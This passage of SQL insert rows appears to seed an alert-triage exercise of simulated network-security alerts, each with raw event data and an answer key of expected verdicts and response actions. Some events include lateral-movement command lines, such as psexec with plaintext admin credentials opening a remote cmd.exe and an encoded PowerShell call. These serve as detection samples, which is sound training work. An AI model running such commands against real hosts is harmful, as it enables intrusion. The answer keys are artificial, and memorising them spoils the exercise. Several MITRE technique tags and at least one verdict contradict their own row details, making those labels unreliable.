address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for C2 activity, indicating a likely compromise.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1894, 'Routine IT Vulnerability Scanning Detected', 'low', 'Suricata', 'Network traffic patterns characteristic of vulnerability scanning were detected from an internal scanning server. This aligns with the scheduled IT security audits.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"scan-server\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for scheduled scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP for vulnerability scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity is consistent with routine internal scans.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1895, 'Misconfigured Legacy Application Traffic', 'medium', 'Corelight', 'Anomalous traffic resembling C2 communication was generated by a legacy application due to misconfiguration. No malicious indicators found.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"172.16.0.100\",\"dst_ip\":\"198.51.100.25\",\"username\":\"legacy_app_user\",\"hostname\":\"legacy-server\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"External IP with no malicious reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The traffic pattern is due to a known issue with the application configuration.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1896, 'Authorized Administrative Backup Detected', 'low', 'Darktrace', 'Large volumes of data transfer were detected from a file server to an external backup service. The activity matches the scheduled backup processes.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"203.0.113.200\",\"username\":\"backup_admin\",\"hostname\":\"fileserver-02\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for backup\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"External backup service IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Data transfer aligns with known backup schedules, indicating no threat.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1897, 'Benign System Health Check Traffic', 'low', 'Wireshark', 'Detected network traffic from an internal monitoring tool performing standard system health checks. No malicious indicators were found.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:50:20Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"\",\"hostname\":\"monitoring-tool\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for monitoring\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP for health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The detected traffic is consistent with scheduled health checks by IT.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1898, 'Unauthorized Lateral Movement Detected via PSExec', 'high', 'Darktrace', 'An internal host attempted unauthorized lateral movement using PSExec. The activity was detected between two internal systems.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"10.0.0.60\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-SERVER01\",\"command_line\":\"psexec \\\\\\\\10.0.0.60 -u admin -p password cmd.exe\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a finance department workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a finance department server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.0.0.60 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command often used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with administrator credentials indicates a potential unauthorized access attempt for lateral movement.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1899, 'Routine IT Vulnerability Scanning Detected', 'low', 'Zeek', 'Network traffic pattern resembling vulnerability scanning was detected. This matches the known schedule for routine IT scans.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"scanner\",\"hostname\":\"IT-Server\",\"command_line\":\"nmap -sS 192.168.1.101\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP belongs to IT department\'s scanning server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP belongs to a network device routinely scanned for vulnerabilities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Nmap scan detected, part of scheduled vulnerability assessment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity matches the schedule for routine IT vulnerability scans and poses no threat.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1900, 'Authorized Administrative Backup Traffic', 'low', 'Corelight', 'Data transfer detected between servers, matching the pattern of scheduled administrative backups.', 'Data Exfil', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.51\",\"username\":\"backup_user\",\"hostname\":\"BACKUP-SERVER\",\"command_line\":\"rsync -av /data 192.168.1.51:/backup\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP is associated with the primary backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.51\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP is associated with the target backup storage server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rsync -av /data 192.168.1.51:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Rsync command matches scheduled backup operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected data transfer is consistent with scheduled administrative backups and requires no further action.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1901, 'Misconfigured Legacy App Generating Excess Traffic', 'medium', 'Suricata', 'A legacy application is generating excessive network traffic, resembling potential data exfiltration.', 'Data Exfil', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.100\",\"dst_ip\":\"203.0.113.10\",\"username\":\"legacy_user\",\"hostname\":\"LEGACY-APP-SERVER\",\"command_line\":\"legacy_app --export-data --target 203.0.113.10\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP associated with a trusted partner\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"legacy_app --export-data --target 203.0.113.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command matches routine data export operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert was generated due to a misconfigured legacy application, but the external IP is trusted, and routine operations were confirmed.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1902, 'System Health Check Triggering Suspicious Activity Alerts', 'low', 'Wireshark', 'Network traffic resembling a potential attack was detected, originating from a routine system health check script.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"192.168.3.20\",\"username\":\"sysadmin\",\"hostname\":\"HEALTH-CHECK01\",\"command_line\":\"ping -c 4 192.168.3.20\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP belongs to a system performing routine health checks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP is a target device of routine health checks\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"ping -c 4 192.168.3.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Ping command is part of routine system health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The detected network activity is consistent with routine system health checks and poses no threat.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1903, 'Unauthorized Remote Access Attempt Detected', 'medium', 'Zeek', 'Anomalous remote login attempt detected from an external IP address, potentially indicating a brute force attack. Multiple failed login attempts reported.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.15\",\"username\":\"admin\",\"hostname\":\"server01\",\"failed_attempts\":12}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 15 times for suspicious activity but no confirmed attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common username for administrative accounts.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Login attempts were from a known IP range used by a legitimate external monitoring service.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1904, 'Routine Network Health Check Triggered Data Exfiltration Alert', 'low', 'Suricata', 'Network activity resembling data exfiltration detected, originating from a known internal scanner conducting routine checks.', 'Data Exfil', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.1.25\",\"dst_ip\":\"192.168.1.100\",\"hostname\":\"network-scanner\",\"data_volume\":\"500MB\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Inventory\",\"verdict\":\"internal\",\"details\":\"IP address belongs to internal network scanning tool.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Activity aligns with scheduled network health checks; no actual data exfiltration detected.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1905, 'Suspicious Command Execution Detected on Web Server', 'high', 'Corelight', 'Potential command injection detected on a web server. The command executed appears to be part of a routine script used for maintenance.', 'Lateral Movement', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.5\",\"hostname\":\"webserver01\",\"command_line\":\"/usr/bin/bash /opt/scripts/cleanup.sh\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/bin/bash /opt/scripts/cleanup.sh\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Script matches known maintenance routines.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command matches a routine maintenance script executed by authorized personnel.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1906, 'Anomalous DNS Traffic Indicating Potential C2 Communication', 'medium', 'Wireshark', 'Unusual DNS queries detected that resemble C2 beaconing. Queries originate from a misconfigured device sending repeated DNS requests.', 'Malware', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:22:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.0.20\",\"hostname\":\"misconfigured-device\",\"domain\":\"beacon.example.com\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"beacon.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain seen in unusual traffic patterns; no confirmed malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Inventory\",\"verdict\":\"internal\",\"details\":\"Device identified as a misconfigured IoT device.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The device was generating unusual DNS requests due to a configuration error; not indicative of C2 communication.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1907, 'Confirmed Malware Infection Detected on Workstation', 'critical', 'Darktrace', 'Malware detected on a workstation attempting to communicate with a known malicious IP. Immediate attention required to prevent data breach.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:05:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.45\",\"dst_ip\":\"203.0.113.99\",\"hostname\":\"workstation12\",\"file_hash\":\"3b2e1a7f9c1d4e5a8f4b5c6d7e8f9a0b\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple malware campaigns and C2 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b2e1a7f9c1d4e5a8f4b5c6d7e8f9a0b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware variant used in targeted attacks.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Malicious IP and file hash confirmed through OSINT; immediate remediation necessary to prevent further compromise.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1908, 'Unusual Network Connection from Internal System', 'medium', 'Zeek', 'A network connection from an internal IP to a known external IP associated with routine IT vulnerability scanning was detected.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"itadmin\",\"hostname\":\"internal-server-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, part of routine operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with vulnerability scanning services, no malicious activity.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"IP 203.0.113.45 is associated with authorized vulnerability scanning. No further action required.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1909, 'Failed Login Attempts Detected on Internal System', 'low', 'Corelight', 'Multiple failed login attempts were detected from a foreign IP address on an internal system. IP is associated with benign activity.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:23:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"hostname\":\"workstation-02\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP has no reports of malicious activity. Likely benign scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, normal operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Failed login attempts from IP 198.51.100.23 have no malicious intent; likely routine activity.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1910, 'Routine Backup Traffic Mistaken for Data Exfiltration', 'low', 'Darktrace', 'Data transfer from an internal server to an external backup server was flagged as suspicious data exfiltration.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"backupadmin\",\"hostname\":\"backup-server-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, routine backup operation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP is associated with authorized external backup services.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Data transfer to IP 203.0.113.200 is part of regular backup procedures.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1911, 'Authorized Admin Access Mistaken for Lateral Movement', 'medium', 'Suricata', 'Admin access from a central management console to an internal server was flagged as potential lateral movement.', 'Lateral Movement', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"adminuser\",\"hostname\":\"mgmt-console\",\"request_body\":\"\",\"command_line\":\"wmic /node:10.0.0.25 process call create calc.exe\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, recognized admin console.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, normal server operation.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.0.0.25 process call create calc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized command execution by admin user.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Command execution was performed by an authorized admin user via a recognized management console.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1912, 'Malicious Command Execution Detected on Internal Server', 'high', 'Wireshark', 'A command was executed on an internal server that matches known patterns of malicious activity, indicating potential compromise.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.35\",\"username\":\"unknown\",\"hostname\":\"compromised-server\",\"request_body\":\"\",\"command_line\":\"powershell -EncodedCommand Y2FsYy5leGU=\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, potential compromised source.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, potential compromised target.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand Y2FsYy5leGU=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of unauthorized access.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The encoded PowerShell command suggests lateral movement activity with malicious intent.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1913, 'Suspicious Network Activity Detected - False Positive', 'medium', 'Suricata', 'Routine IT vulnerability scan detected as potential data exfiltration attempt. The source IP belongs to an internal security tool.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"scanner01\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for authorized vulnerability scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This is a known internal IP used for routine scanning, not an actual exfiltration event.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1914, 'False Positive: Routine Administrative Backup', 'low', 'Corelight', 'Backup traffic misidentified as data exfiltration. The activity was normal and expected for scheduled backups.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.50.10\",\"dst_ip\":\"192.168.50.20\",\"username\":\"backupuser\",\"hostname\":\"backupserver\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.50.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address used for authorized data backup.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The IP address is part of a known backup server cluster performing routine operations.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
